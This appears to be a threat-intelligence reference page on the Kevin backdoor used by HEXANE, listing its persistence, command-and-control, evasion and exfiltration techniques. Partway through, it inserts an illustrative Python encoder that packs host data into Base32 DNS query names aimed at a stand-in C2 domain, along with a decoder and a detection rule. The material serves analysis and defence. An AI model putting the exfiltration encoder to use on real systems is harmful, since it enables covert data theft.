Kevin

Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.[1]

ID: S1020
Type: MALWARE
Platforms: Windows
Version: 1.1
Created: 14 June 2022
Last Modified: 17 April 2024

Techniques Used

Domain ID Name Use
Enterprise T1546 .003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

Kevin can compile randomly-generated MOF files into the WMI repository to persistently run malware.[1]

Enterprise T1005 Data from Local System

Kevin can upload logs and other data from a compromised host.[1]

Enterprise T1036 .003 Masquerading: Rename System Utilities

Kevin has renamed an image of cmd.exe with a random name followed by a .tmpl extension.[1]

Enterprise T1572 Protocol Tunneling

Kevin can use a custom protocol tunneled through DNS or HTTP.[1]

Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

Kevin can use a renamed image of cmd.exe for execution.[1]

Enterprise T1008 Fallback Channels

Kevin can assign hard-coded fallback domains for C2.[1]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Variants of Kevin can communicate with C2 over HTTP.[1]

Enterprise T1071 .004 Application Layer Protocol: DNS

Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information.[1]

Enterprise T1030 Data Transfer Size Limits

Kevin can exfiltrate data to the C2 server in 27-character chunks.[1]

Enterprise T1074 Data Staged

Kevin can create directories to store logs and other collected data.[1]

Enterprise T1001 .001 Data Obfuscation: Junk Data

Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic.[1]

Enterprise T1132 .001 Data Encoding: Standard Encoding

Kevin can Base32 encode chunks of output files during exfiltration.[1]

Enterprise T1106 Native API

Kevin can use the ShowWindow API to avoid detection.[1]

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Kevin has Base64-encoded its configuration file.[1]

Enterprise T1070 .004 Indicator Removal: File Deletion

Kevin can delete files created on the victim's machine.[1]

Enterprise T1082 System Information Discovery

Kevin can enumerate the OS version and hostname of a targeted machine.[1]

Enterprise T1016 System Network Configuration Discovery

Kevin can collect the MAC address and other network configuration details from a victim machine by running ipconfig /all.[1]

Enterprise T1497 Virtualization/Sandbox Evasion

Kevin can sleep for a time interval between C2 communication attempts.[1]

Enterprise T1105 Ingress Tool Transfer

Kevin can download files to the compromised host.[1]

Enterprise T1041 Exfiltration Over C2 Channel

Kevin can send data from the victim host through a DNS C2 channel.[1]
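Several of the entries above describe one mechanism seen from different angles: output is Base32-encoded (T1132.001), sent in 27-character chunks (T1030), and carried in queries for constructed names that embed the data under a C2 domain (T1071.004, T1041). The Python below is an added example, not code from the Kevin implant or from the cited report. It builds such queries, reassembles them the way a C2 server would, and then flags them in a constructed DNS query log. The C2 domain `c2.example`, the label layout `<chunk>.<sequence>.<session>.<domain>`, the choice to apply the 27-character limit to the encoded text rather than the raw bytes, and the log line format are all assumptions made for the example; the report does not specify them.

```python
import base64
import string
from collections import Counter
from typing import Dict, Iterable, List

CHUNK_LEN = 27                                       # chunk size reported for Kevin
C2_DOMAIN = "c2.example"                             # hypothetical C2 domain (assumption)
B32_LOWER = set(string.ascii_lowercase + "234567")   # Base32 alphabet, lowercased


def encode_for_dns(data: bytes, session: str = "a1", domain: str = C2_DOMAIN) -> List[str]:
    """Implant side (illustrative): Base32-encode the data, drop the '=' padding
    (not valid in a hostname label), split the text into CHUNK_LEN-character labels
    and build one query name per chunk. Assumed layout: <chunk>.<seq>.<session>.<domain>."""
    text = base64.b32encode(data).decode("ascii").rstrip("=")
    names = []
    for seq, start in enumerate(range(0, len(text), CHUNK_LEN)):
        chunk = text[start:start + CHUNK_LEN]
        names.append(f"{chunk}.{seq}.{session}.{domain}".lower())
    return names


def decode_from_dns(names: Iterable[str], domain: str = C2_DOMAIN) -> bytes:
    """Server side: collect chunks by sequence number, restore padding and decode."""
    parts: Dict[int, str] = {}
    suffix = "." + domain.lower()
    for name in names:
        name = name.rstrip(".").lower()
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3:
            continue
        parts[int(labels[1])] = labels[0]
    text = "".join(parts[k] for k in sorted(parts))
    text += "=" * (-len(text) % 8)   # Base32 input length must be a multiple of 8
    return base64.b32decode(text, casefold=True)


def flag_chunked_queries(log_lines: Iterable[str], min_queries: int = 2) -> Dict[str, int]:
    """Detection: count queries whose leftmost label is exactly CHUNK_LEN characters
    drawn from the Base32 alphabet, grouped by the last two labels (a rough stand-in
    for the registered domain). Returns {domain: count} for domains reaching
    min_queries. Constructed log format: '<timestamp> <client_ip> <qname> <qtype>'."""
    counts: Counter = Counter()
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        labels = fields[2].rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue
        first = labels[0]
        if len(first) == CHUNK_LEN and set(first) <= B32_LOWER:
            counts[".".join(labels[-2:])] += 1
    return {d: n for d, n in counts.items() if n >= min_queries}


# Constructed sample: 50 bytes of host details of the kind the implant collects.
SAMPLE_DATA = b"hostname=WS01 os=10.0.19044 mac=00-11-22-33-44-55\n"

# Constructed DNS query log: the exfiltration queries mixed with benign lookups.
_EXFIL_LINES = [
    f"2024-04-17T10:00:0{i + 2}Z 10.0.0.5 {q} A"
    for i, q in enumerate(encode_for_dns(SAMPLE_DATA))
]
SAMPLE_LOG = [
    "2024-04-17T10:00:00Z 10.0.0.5 www.example.com A",
    "2024-04-17T10:00:01Z 10.0.0.5 login.microsoftonline.com A",
    *_EXFIL_LINES,
    "2024-04-17T10:00:09Z 10.0.0.5 outlook.office365.com A",
]

if __name__ == "__main__":
    queries = encode_for_dns(SAMPLE_DATA)
    for q in queries:
        print(q)
    assert decode_from_dns(queries) == SAMPLE_DATA
    print(flag_chunked_queries(SAMPLE_LOG))
```

Fifty bytes of output become 80 Base32 characters and therefore three queries (27, 27 and 26 characters), which is why the detector counts two matching queries for `c2.example` in the sample log: a fixed label length is only a weak signal on its own, so the count threshold per domain, and in practice a minimum observation window, is what keeps the rule from firing on ordinary CDN or telemetry hostnames.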

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Kevin can hide the current window from the targeted user via the ShowWindow API function.[1]

Groups That Use This Software

ID Name References
G1001 HEXANE [1]

References